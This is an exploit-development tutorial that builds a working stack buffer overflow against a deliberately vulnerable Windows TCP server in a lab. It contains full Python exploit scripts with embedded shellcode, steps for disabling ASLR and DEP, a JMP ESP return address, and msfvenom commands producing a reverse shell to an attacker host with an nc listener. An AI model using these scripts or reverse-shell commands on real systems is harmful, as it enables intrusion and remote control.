Exploiting a Stack Buffer Overflow on Windows
Thilan Dissanayaka Exploit development Apr 12, 2020

In a previous tutorial, we exploited a buffer overflow vulnerability on a Linux machine. I went through the theory in depth and explained each step: how the stack works, how the return address gets overwritten, and how we redirect execution to our shellcode.

Now we're jumping into the Windows world. Windows is a favorite target for exploit developers since it powers the majority of desktops. The concepts are the same: buffer overflows work the same way regardless of the OS, but the tools, protections, and quirks are different.

I strongly advise you to go and read the Linux tutorial before this one. We'll be building on those fundamentals here.

In this blog post, we'll dive into Windows 32-bit exploit development by exploiting a buffer overflow vulnerability in a simple TCP server. We'll crash it, find the offset, control EIP, deal with Windows protections (ASLR and DEP), understand why shellcode placement matters, and ultimately pop a reverse shell.

Let's get into it.

Understanding the Vulnerable Code

void handle_client(SOCKET client) {
    char buffer[512];
    int recv_size;

    // Vulnerable: no bounds checking!
    recv_size = recv(client, buffer, 1024, 0);
    if (recv_size == SOCKET_ERROR) {
        printf("recv failed\n");
        closesocket(client);
        return;
    }

    buffer[recv_size] = '\0';
    printf("Received: %s\n", buffer);

    closesocket(client);
}

Here's the critical part. The function allocates a 512-byte buffer on the stack, but the recv() call allows up to 1024 bytes to be received. There's no bounds checking. If the client sends more than 512 bytes, the extra data overflows past the buffer and overwrites whatever comes next on the stack, including the saved EBP and the saved return address (the value that ret later loads into EIP).

This is the classic stack buffer overflow pattern. Our goal is to send a carefully crafted payload that overwrites EIP with an address we control, redirecting execution to our shellcode.

Let's compile and run it. I'm using Windows 7 32-bit as the target machine, compiling the server with gcc on that machine.

The server is up and running. Let's test it with a normal connection first.

thilan@macbook:~$ nc 192.168.64.15 9999
hello

I'm using netcat to open a TCP connection to the target machine at 192.168.64.15 on port 9999 and send a small string.

The server received the data and printed it to the console. Everything works as expected. Now let's see what happens when we send more data than the buffer can hold.

thilan@macbook:~$ python3 -c "print('A' * 1000)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ...

We use Python to generate 1000 A characters (0x41 in hex) and pipe them into netcat, the same way we connected before (nc 192.168.64.15 9999). Since the buffer is only 512 bytes, we're sending almost double what it can hold.

The server crashed. Windows threw an error dialog — the program tried to execute an instruction at an invalid address. Our 1000 As overflowed the buffer, overwrote the saved return address, and when the function tried to return, it jumped to 0x41414141 (AAAA) — which is obviously not a valid code address.
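
A quick way to recognise our own input in a crash address is to decode it back to ASCII. Here's a minimal sketch of that idea. The helper name address_to_ascii is my own, not part of any debugger or tool.

```python
import struct

def address_to_ascii(address):
    """Return the 4 bytes of a 32-bit value, in memory (little-endian) order, as text."""
    raw = struct.pack("<I", address)
    # Bytes outside the ASCII range are shown as a replacement character.
    return raw.decode("ascii", errors="replace")

print(address_to_ascii(0x41414141))  # AAAA
```

If the decoded text looks like part of what we sent, the crash address came from our data.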

We've confirmed the vulnerability exists. Now we need to take control of it.

Time to Reverse Engineer

Now it's time to dig deeper. We need to understand exactly what's happening on the stack. How many bytes of padding do we need to reach EIP? What does the stack frame look like?

In the Linux tutorial, we used GDB for this. On Windows, we have tools like Immunity Debugger, x32dbg, and OllyDbg. In this tutorial, we'll use x32dbg. It's free, modern, and has an excellent interface for 32-bit debugging.

I launched x32dbg and loaded the vulnerable server binary into it.

The debugger interface gives us everything we need in one view. The four most important sections are:

  • CPU instructions view — Shows disassembled instructions at the current execution point
  • CPU registers — Shows the current values of all registers (EAX, EBX, EIP, ESP, etc.)
  • Memory dump — Raw hex view of any memory region
  • Stack view — Shows the current stack contents

Let's look at the first two more closely, starting with the CPU instructions view.

It displays the assembly instructions currently being executed and shows addresses, opcodes, mnemonics, and comments.

We can set breakpoints, step through instructions, or follow jumps here.

The next important section is the CPU registers window.

This section shows all CPU registers and their current values:

  • General-purpose: EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP
  • Instruction pointer: EIP
  • Segment registers: CS, DS, ES, FS, GS, SS
  • Flags register: EFLAGS (and decoded flags like ZF, SF, CF, etc.)

We can double-click a register to modify its value.

Finding the Exact Offset

Now for the critical question — exactly how many bytes do we need to send before we start overwriting EIP? Too few and we don't reach it. Too many and we overshoot.

We could guess and check, but there's a smarter way called cyclic patterns. We generate a unique sequence of characters where every 4-byte subsequence appears only once. When EIP gets overwritten, the value in EIP tells us the exact offset.

We'll use the same pattern generation tool from the Linux tutorial.

We generate the pattern, send it to the vulnerable server, and check what value ended up in EBP after the crash.

In this case, EBP was overwritten with 35724134. Feeding this back into the pattern offset tool gives us 524. That means we need exactly 524 bytes of padding to reach EBP. Since EBP is 4 bytes wide (32-bit), the return address (EIP) starts at offset 528 (524 + 4).
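
To make the lookup less magical, here's a rough sketch of how a pattern tool can work. It assumes the Metasploit-style sequence (Aa0Aa1Aa2...), which is my assumption about the tool from the Linux tutorial. The function names cyclic_pattern and pattern_offset are made up for this example.

```python
import string
import struct

def cyclic_pattern(length):
    """Build a Metasploit-style pattern: Aa0Aa1...Aa9Ab0... truncated to length bytes."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length].encode("ascii")
    return "".join(triples)[:length].encode("ascii")

def pattern_offset(register_value, length=1024):
    """Find where the 4 bytes seen in a register sit inside the pattern (-1 if absent)."""
    needle = struct.pack("<I", register_value)  # registers hold the bytes little-endian
    return cyclic_pattern(length).find(needle)

print(pattern_offset(0x35724134))  # 524
```

The value 0x35724134 is the bytes "4Ar5" in memory order, and that sequence starts 524 bytes into the pattern, which matches what the offset tool reported.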

The stack layout looks like this:

|  buffer (512 bytes)  |  local vars (12 bytes)  |  EBP (4 bytes)  |  EIP (4 bytes)  |
|<-------- 524 bytes of padding ----------------->|<-- 4 bytes ---->|<-- 4 bytes ---->|

Verifying EIP Control

Now let's confirm we can precisely control EIP. We'll craft a payload where:

  • 524 As (0x41) fill the buffer and local variables
  • 4 Bs (0x42) overwrite EBP
  • 4 Cs (0x43) overwrite EIP

thilan@macbook:~$ python3 -c "print('A' * 524 + 'B' * 4 + 'C' * 4)"
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
...
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC

If our offset is correct, we should see EBP = 42424242 and EIP = 43434343.
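
Before looking at the debugger, we can sanity-check the expectation with a toy model of the stack frame. This is only a sketch: it treats the frame as a flat byte array using the 524-byte offset we measured, and simulate_overwrite is a hypothetical helper, not something the server or debugger provides.

```python
import struct

BUFFER_TO_SAVED_EBP = 524  # offset found with the cyclic pattern

def simulate_overwrite(payload):
    """Copy payload into a model frame and return (saved_ebp, return_address)."""
    # Model frame: buffer + locals (524 bytes), saved EBP (4), return address (4).
    frame = bytearray(BUFFER_TO_SAVED_EBP + 8)
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]
    return struct.unpack_from("<II", frame, BUFFER_TO_SAVED_EBP)

ebp, eip = simulate_overwrite(b"A" * 524 + b"B" * 4 + b"C" * 4)
print(hex(ebp), hex(eip))  # 0x42424242 0x43434343
```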

There it is. EBP = 42424242 (four B's) and EIP = 43434343 (four C's). We have precise control over the instruction pointer.

Looking at the stack view, we can see the sea of 41s (our A padding) filling the buffer.

This is the moment where a buffer overflow becomes an exploit. We control where the program jumps next. Now we need to make it jump somewhere useful: to our shellcode.

Generating Shellcode

To turn this crash into code execution, we need shellcode, a small piece of machine code that does something useful. We'll use msfvenom from the Metasploit framework to generate it. msfvenom can create payloads for virtually any platform and architecture.

thilan@macbook:~$ msfvenom -p windows/exec CMD=calc.exe -f python -a x86 --platform windows -b "\x00"

Let's break down this command:

  • -p windows/exec CMD=calc.exe: The payload. When executed, it launches calc.exe on the target. We start with calc because it gives visual confirmation: if a calculator pops up, we know we have code execution.
  • -f python: Output format. Generates Python-compatible byte strings we can paste directly into our exploit script.
  • -a x86 --platform windows: Target architecture and platform.
  • -b "\x00": Bad characters to avoid. The null byte (\x00) is the classic one because C string functions such as strcpy() stop copying at it. recv() itself copies raw bytes and would not stop there, but excluding \x00 is a safe default. msfvenom uses an encoder (like shikata_ga_nai) to produce shellcode without the listed bytes.
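
Whatever the bad-character list ends up being, it's worth checking generated bytes against it before pasting them into a script. Here's a small sketch of such a check. The function name find_bad_bytes and the sample bytes are made up for illustration.

```python
def find_bad_bytes(data, bad_chars=b"\x00"):
    """Return (offset, value) pairs for every byte of data that appears in bad_chars."""
    return [(i, b) for i, b in enumerate(data) if b in bad_chars]

sample = b"\x90\x90\x00\x41"   # made-up bytes, not real shellcode
print(find_bad_bytes(sample))  # [(2, 0)]
```

An empty list means none of the listed bytes are present.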

msfvenom successfully generated the payload.

Now we need to decide where to put the shellcode, given the stack layout we mapped out earlier.

My first idea was to put the shellcode in the buffer (the lower side of the stack, before EBP). Then overwrite EIP with the address of the beginning of our shellcode. We'd also use a NOP sled (\x90 bytes) before the shellcode to give us some landing room. If EIP doesn't hit the exact start of the shellcode, the NOPs will slide execution forward until it reaches the payload.

Here's the Python code for that. It shouldn't be anything new, since we did the same thing in the last tutorial. The only difference is that we're sending the data over the network instead of writing it to a file.

import socket

ip = "192.168.64.15"
port = 9999

offset = 524  # bytes from the start of the buffer to the saved EBP
ret_address = b"\xB0\x12\x50\x62"

nop_sled = b"\x90" * 16

shellcode = b""
shellcode += b"\xda\xd4\xb8\x8e\xca\x73\xdc\xd9\x74\x24\xf4\x5b"
shellcode += b"\x2b\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43"
shellcode += b"\x9a\x28\x86\x20\x4a\x2e\x69\xd9\x8a\x4f\xe3\x3c"
shellcode += b"\xbb\x4f\x97\x35\xeb\x7f\xd3\x18\x07\x0b\xb1\x88"
shellcode += b"\x9c\x79\x1e\xbe\x15\x37\x78\xf1\xa6\x64\xb8\x90"
shellcode += b"\x24\x77\xed\x72\x15\xb8\xe0\x73\x52\xa5\x09\x21"
shellcode += b"\x0b\xa1\xbc\xd6\x38\xff\x7c\x5c\x72\x11\x05\x81"
shellcode += b"\xc2\x10\x24\x14\x59\x4b\xe6\x96\x8e\xe7\xaf\x80"
shellcode += b"\xd3\xc2\x66\x3a\x27\xb8\x78\xea\x76\x41\xd6\xd3"
shellcode += b"\xb7\xb0\x26\x13\x7f\x2b\x5d\x6d\x7c\xd6\x66\xaa"
shellcode += b"\xff\x0c\xe2\x29\xa7\xc7\x54\x96\x56\x0b\x02\x5d"
shellcode += b"\x54\xe0\x40\x39\x78\xf7\x85\x31\x84\x7c\x28\x96"
shellcode += b"\x0d\xc6\x0f\x32\x56\x9c\x2e\x63\x32\x73\x4e\x73"
shellcode += b"\x9d\x2c\xea\xff\x33\x38\x87\x5d\x59\xbf\x15\xd8"
shellcode += b"\x2f\xbf\x25\xe3\x1f\xa8\x14\x68\xf0\xaf\xa8\xbb"
shellcode += b"\xb5\x40\xe3\xe6\x9f\xc8\xaa\x72\xa2\x94\x4c\xa9"
shellcode += b"\xe0\xa0\xce\x58\x98\x56\xce\x28\x9d\x13\x48\xc0"
shellcode += b"\xef\x0c\x3d\xe6\x5c\x2c\x14\x85\x03\xbe\xf4\x64"
shellcode += b"\xa6\x46\x9e\x78"

# NOP sled and shellcode sit inside the buffer, padded out to the saved EBP
payload = nop_sled + shellcode + b"A" * (offset - len(nop_sled) - len(shellcode)) + b"A" * 4 + ret_address

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(payload)  # sendall() keeps sending until the whole payload is out
s.close()

Everything is in place. Run the exploit. If it works, we should see a calculator window pop up on the Windows machine.

But it doesn't work. No calculator. No crash. Nothing useful happens.

Why It Doesn't Work — Windows Protections

Honestly, at the time of writing this, I know exactly why it fails. But the first time I tried this exploit and it failed, I spent hours searching through Stack Overflow, Reddit, and random blog posts before I understood the reasons.

There are three things working against us:

1. ASLR (Address Space Layout Randomization)

ASLR randomizes where the executable, DLLs, stack, and heap end up in memory. On Windows, image base addresses are typically re-randomized at boot, while stack and heap locations change from run to run. That means the address we hardcoded for our return (\xB0\x12\x50\x62) might point to completely different memory the next time. We dealt with ASLR in the Linux tutorial too. It's the same concept.

2. DEP (Data Execution Prevention)

This is the big one. DEP marks the stack (and heap) as non-executable. Even if our shellcode lands perfectly on the stack and EIP points right at it, the CPU refuses to execute it because the stack pages have the NX (No Execute) bit set. The processor literally says "this memory region is data, not code" and throws an access violation.

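DEP first shipped with Windows XP Service Pack 2, but on desktop versions of Windows the default policy is opt-in: only system components and executables that request it through a flag in their PE header are covered. ASLR arrived later, with Windows Vista. That's why classic stack overflows often "just worked" against older XP-era targets but fail against a binary that opts in on Win7+.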

3. Shellcode Placement in the Buffer

Even without DEP and ASLR, placing shellcode before EIP (in the buffer) has reliability issues on Windows. We'll explore this in detail shortly.

I chose Windows 7 specifically because these protections are important to understand. In future tutorials, we'll explore advanced techniques to bypass DEP (using ROP chains) and ASLR (using info leaks). But for now, let's disable them so we can focus on understanding the core overflow mechanics.

Disabling ASLR and DEP

Both ASLR and DEP are controlled by flags in the PE header of the executable. We can disable them by editing these flags using a PE editor like CFF Explorer or PE Bear.

Here's the process using CFF Explorer:

  1. Open CFF Explorer as Administrator and load the vulnerable binary
  2. Navigate to NT Headers -> Optional Header -> DllCharacteristics
  3. Click the Edit Hex Value button (pencil icon)
  4. Replace the existing value 0140 with 0000 — this clears both the DYNAMIC_BASE flag (ASLR) and the NX_COMPAT flag (DEP)
  5. Save the file

The hex value 0140 breaks down to:

  • 0x0040 = IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR enabled)
  • 0x0100 = IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP enabled)

Setting it to 0000 disables both. Now when we run the modified binary, the stack is executable and addresses are predictable.
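
The flag arithmetic is easy to check by hand, but here's a short sketch that decodes the value for us. The two constants are the documented PE flag values listed above. The function names describe and clear_mitigations are my own.

```python
DYNAMIC_BASE = 0x0040  # IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE (ASLR)
NX_COMPAT = 0x0100     # IMAGE_DLLCHARACTERISTICS_NX_COMPAT (DEP)

def describe(dll_characteristics):
    """Report which of the two mitigation flags are set in a DllCharacteristics value."""
    return {
        "aslr": bool(dll_characteristics & DYNAMIC_BASE),
        "dep": bool(dll_characteristics & NX_COMPAT),
    }

def clear_mitigations(dll_characteristics):
    """Clear only the ASLR and DEP bits and leave every other flag untouched."""
    return dll_characteristics & ~(DYNAMIC_BASE | NX_COMPAT)

print(describe(0x0140))                # {'aslr': True, 'dep': True}
print(hex(clear_mitigations(0x0140)))  # 0x0
```

If a binary has other bits set as well, masking like this is safer than blindly writing 0000, since it keeps the unrelated flags.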

With those protections out of the way, let's address the third problem.

Why the Buffer (Lower Side) is a Bad Place for Shellcode

To understand why placing shellcode before EIP (in the buffer region) is unreliable, we need to look at what happens during the function epilogue — the instructions that execute when handle_client() returns.

When the function finishes, the compiler generates epilogue instructions like:

mov esp, ebp    ; Restore stack pointer to where it was before local variables
pop ebp         ; Restore saved EBP
ret             ; Pop return address into EIP and jump to it

Here's the critical part. The mov esp, ebp instruction moves the stack pointer up past all the local variables (including our buffer). Then pop ebp moves it up by another 4 bytes. And then ret pops the return address.

At this point, ESP now points to the memory right AFTER the overwritten EIP — the higher addresses on the stack, not the buffer below.
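
We can follow ESP through those three instructions with simple arithmetic. The sketch below is only a model: the EBP value 0x0022FF00 is a made-up example address, and the 524-byte distance is the offset we measured earlier.

```python
def esp_after_epilogue(ebp):
    """Follow ESP through mov esp, ebp / pop ebp / ret on 32-bit x86."""
    esp = ebp   # mov esp, ebp : ESP now points at the saved EBP slot
    esp += 4    # pop ebp      : ESP now points at the return address slot
    esp += 4    # ret          : ESP now points just past the return address
    return esp

frame_ebp = 0x0022FF00           # hypothetical value, for illustration only
buffer_start = frame_ebp - 524   # the buffer begins 524 bytes below the saved EBP

print(hex(esp_after_epilogue(frame_ebp)))            # 0x22ff08
print(esp_after_epilogue(frame_ebp) - buffer_start)  # 532
```

So once ret has run, ESP sits 532 bytes above the start of the buffer, directly after the 4 bytes that held the return address.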

But here's the real problem. After ret executes and we redirect EIP to the buffer (lower side), the stack pointer ESP is pointing above our shellcode. Any PUSH instructions in our shellcode, or any function calls (which use the stack), will write data downward, right on top of our shellcode. The shellcode literally overwrites itself as it executes.

This is the "stack corruption" problem. The shellcode and the active stack space overlap, and they destroy each other.

On Linux, this sometimes works because the shellcode might be small enough and not use many stack operations. But on Windows, shellcode generated by msfvenom typically uses PUSH instructions heavily (for setting up API calls), and the Windows API functions themselves use the stack. The corruption is almost guaranteed.

The solution? Put the shellcode AFTER EIP, not before it. After the ret instruction executes, ESP points to the memory right after where EIP was stored. If we place our shellcode there, ESP is pointing at (or near) our shellcode, and the active stack grows away from it instead of into it.
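
To put rough numbers on the two placements, here's a small sketch that measures how far the stack can grow before it reaches our code. Offsets are relative to the start of the buffer. The 220 is the length of the calc shellcode listed in this post, and bytes_before_overlap is a hypothetical helper.

```python
def bytes_before_overlap(esp, code_start, code_len):
    """Bytes the stack can grow downward before reaching the code region.

    Returns None when the code starts at or above ESP, because pushes move
    ESP toward lower addresses and therefore away from the code.
    """
    if code_start >= esp:
        return None
    return max(esp - (code_start + code_len), 0)

ESP_AFTER_RET = 532            # 524 padding + 4 saved EBP + 4 return address
NOPS_AND_SHELLCODE = 16 + 220  # NOP sled plus shellcode

print(bytes_before_overlap(ESP_AFTER_RET, 0, NOPS_AND_SHELLCODE))    # 296
print(bytes_before_overlap(ESP_AFTER_RET, 532, NOPS_AND_SHELLCODE))  # None
```

With the shellcode in the buffer there are only 296 bytes (74 pushes) of breathing room, and nested Windows API calls can easily use more stack than that. With the shellcode after the return address there is no overlap at all.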

The Working Approach — Shellcode After EIP

So our new payload layout is:

| A * 524 (padding) | B * 4 (EBP) | RET ADDRESS (EIP) | NOP sled | SHELLCODE |

After ret executes, EIP jumps to our return address and ESP points right after it, exactly where our NOP sled and shellcode sit. No self-corruption.

But wait, what address do we use for the return? We need EIP to point to our shellcode, but the exact address of ESP after ret might vary slightly. Instead of hardcoding a stack address, we use a technique called JMP ESP. We find a JMP ESP instruction somewhere in the loaded DLLs, set EIP to that address, and when it executes, it jumps to wherever ESP is pointing, which is right at our NOP sled.

We can find a JMP ESP gadget in x32dbg by searching loaded DLLs for the opcode \xFF\xE4. In this case, we found one at address 0x625012B0.
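
x86 stores addresses in little-endian order, so the bytes we send are the address reversed. Rather than reversing by hand, we can let Python's struct module do it and check for bad characters at the same time. This is a small sketch, and pack_address is a name I made up.

```python
import struct

def pack_address(address, bad_chars=b"\x00"):
    """Pack a 32-bit address little-endian and refuse it if it contains a bad byte."""
    packed = struct.pack("<I", address)
    if any(b in bad_chars for b in packed):
        raise ValueError(f"address {address:#010x} contains a bad character")
    return packed

print(pack_address(0x625012B0).hex())  # b0125062
```

The output matches the \xB0\x12\x50\x62 byte order used in the exploit scripts in this post.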

Here's the updated exploit code:

import socket

ip = "192.168.64.15"
port = 9999

offset = 524  # bytes from the start of the buffer to the saved EBP
ret_address = b"\xB0\x12\x50\x62"  # JMP ESP at 0x625012B0, little-endian

nop_sled = b"\x90" * 16

shellcode = b""
shellcode += b"\xda\xd4\xb8\x8e\xca\x73\xdc\xd9\x74\x24\xf4\x5b"
shellcode += b"\x2b\xc9\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43"
shellcode += b"\x9a\x28\x86\x20\x4a\x2e\x69\xd9\x8a\x4f\xe3\x3c"
shellcode += b"\xbb\x4f\x97\x35\xeb\x7f\xd3\x18\x07\x0b\xb1\x88"
shellcode += b"\x9c\x79\x1e\xbe\x15\x37\x78\xf1\xa6\x64\xb8\x90"
shellcode += b"\x24\x77\xed\x72\x15\xb8\xe0\x73\x52\xa5\x09\x21"
shellcode += b"\x0b\xa1\xbc\xd6\x38\xff\x7c\x5c\x72\x11\x05\x81"
shellcode += b"\xc2\x10\x24\x14\x59\x4b\xe6\x96\x8e\xe7\xaf\x80"
shellcode += b"\xd3\xc2\x66\x3a\x27\xb8\x78\xea\x76\x41\xd6\xd3"
shellcode += b"\xb7\xb0\x26\x13\x7f\x2b\x5d\x6d\x7c\xd6\x66\xaa"
shellcode += b"\xff\x0c\xe2\x29\xa7\xc7\x54\x96\x56\x0b\x02\x5d"
shellcode += b"\x54\xe0\x40\x39\x78\xf7\x85\x31\x84\x7c\x28\x96"
shellcode += b"\x0d\xc6\x0f\x32\x56\x9c\x2e\x63\x32\x73\x4e\x73"
shellcode += b"\x9d\x2c\xea\xff\x33\x38\x87\x5d\x59\xbf\x15\xd8"
shellcode += b"\x2f\xbf\x25\xe3\x1f\xa8\x14\x68\xf0\xaf\xa8\xbb"
shellcode += b"\xb5\x40\xe3\xe6\x9f\xc8\xaa\x72\xa2\x94\x4c\xa9"
shellcode += b"\xe0\xa0\xce\x58\x98\x56\xce\x28\x9d\x13\x48\xc0"
shellcode += b"\xef\x0c\x3d\xe6\x5c\x2c\x14\x85\x03\xbe\xf4\x64"
shellcode += b"\xa6\x46\x9e\x78"

# Padding, saved EBP filler, return address, then NOP sled and shellcode after it
payload = b"A" * offset + b"B" * 4 + ret_address + nop_sled + shellcode

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.sendall(payload)  # sendall() keeps sending until the whole payload is out
s.close()

Notice the key change in the payload construction. Previously, we put the shellcode in the buffer (before EIP). Now the layout is:

  1. 524 As — Padding to reach EBP
  2. 4 Bs — Overwrite EBP (don't care about the value)
  3. Return address — Points to a JMP ESP gadget (0x625012B0, written in little-endian as \xB0\x12\x50\x62)
  4. NOP sled — 16 \x90 bytes for landing room
  5. Shellcode — The msfvenom-generated payload

The execution flow is: ret pops our address into EIP -> CPU jumps to JMP ESP -> JMP ESP jumps to the stack (where ESP points) -> NOP sled slides into shellcode -> calc.exe pops up.
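
One thing worth checking with this layout is that the whole payload still fits into what the server reads, since recv() takes at most 1024 bytes. Here's a rough sketch that lays out the pieces and totals them. The 220 is the length of the calc shellcode listed above, and layout is a hypothetical helper.

```python
RECV_LIMIT = 1024  # third argument to recv() in handle_client()

def layout(offset=524, nop_len=16, shellcode_len=220):
    """Return ([(name, start, end), ...], total_size) for the payload pieces."""
    parts = [
        ("padding", offset),
        ("saved EBP", 4),
        ("return address", 4),
        ("NOP sled", nop_len),
        ("shellcode", shellcode_len),
    ]
    table, start = [], 0
    for name, size in parts:
        table.append((name, start, start + size))
        start += size
    return table, start

table, total = layout()
for name, begin, end in table:
    print(f"{name:15} {begin:4}..{end}")
print(total, total <= RECV_LIMIT)  # 768 True
```

A larger payload, such as the reverse shell later in this post, should be checked the same way, because anything past the 1024-byte limit would never be read by this call.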

Let's run it.

Calculator launched. We have code execution. The exploit works. That little calculator window is proof that we can run arbitrary code on the target machine through a network connection.

From calc.exe to a Reverse Shell

Popping a calculator is a great proof of concept, but in a real engagement, we need something more useful like a reverse shell. A reverse shell makes the target machine connect back to us and gives us an interactive command prompt on the target.

We generate a new payload with msfvenom:

thilan@macbook:~$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.8.101 LPORT=4444 -a x86 --platform windows -f python -b "\x00"

The key differences from the calc payload:

  • -p windows/shell_reverse_tcp — Instead of launching a program, this payload creates a TCP connection back to us and binds cmd.exe to it
  • LHOST=192.168.8.101 — Our IP address (the attacker's machine). The target will connect to us.
  • LPORT=4444 — The port we'll be listening on

Before running the exploit, we set up a listener on our machine using netcat:

thilan@macbook:~$ nc -lvnp 4444
listening on [any] 4444 ...

Then we swap the shellcode in our exploit script with the new reverse shell payload, and run it. The vulnerable server receives our payload, EIP gets redirected to our JMP ESP gadget, and the shellcode executes — opening a TCP connection back to our machine.

And there it is: a full Windows command shell, accessible from our attacking machine over the network. We can run any command as if we were sitting at the Windows machine: whoami, ipconfig, dir C:\Users. Anything the vulnerable process has permissions to do, we can do.

This is what makes buffer overflow exploits so powerful. A single missing bounds check in a recv() call turned a simple TCP server into a gateway for full remote access.

Summary — The Complete Exploitation Chain

Let's recap everything we did:

  1. Identified the vulnerability — A 512-byte buffer receiving up to 1024 bytes without bounds checking
  2. Confirmed the crash — Sent 1000 As and observed the program crash
  3. Found the exact offset — Used cyclic patterns to determine that EIP is at offset 528 (524 padding + 4 for EBP)
  4. Verified EIP control — Sent A*524 + B*4 + C*4 and confirmed EIP = 43434343
  5. Dealt with protections — Disabled ASLR and DEP by modifying the PE header with CFF Explorer
  6. Learned why buffer placement fails — Function epilogue moves ESP away from the buffer, causing shellcode self-corruption
  7. Placed shellcode after EIP — Used a JMP ESP gadget to redirect execution to shellcode placed after the return address
  8. Achieved code execution — First with calc.exe, then with a reverse shell

In the next tutorials, we'll tackle the hard part — exploiting buffer overflows with DEP and ASLR enabled, using techniques like Return-Oriented Programming (ROP) and information leaks.

Happy hacking!
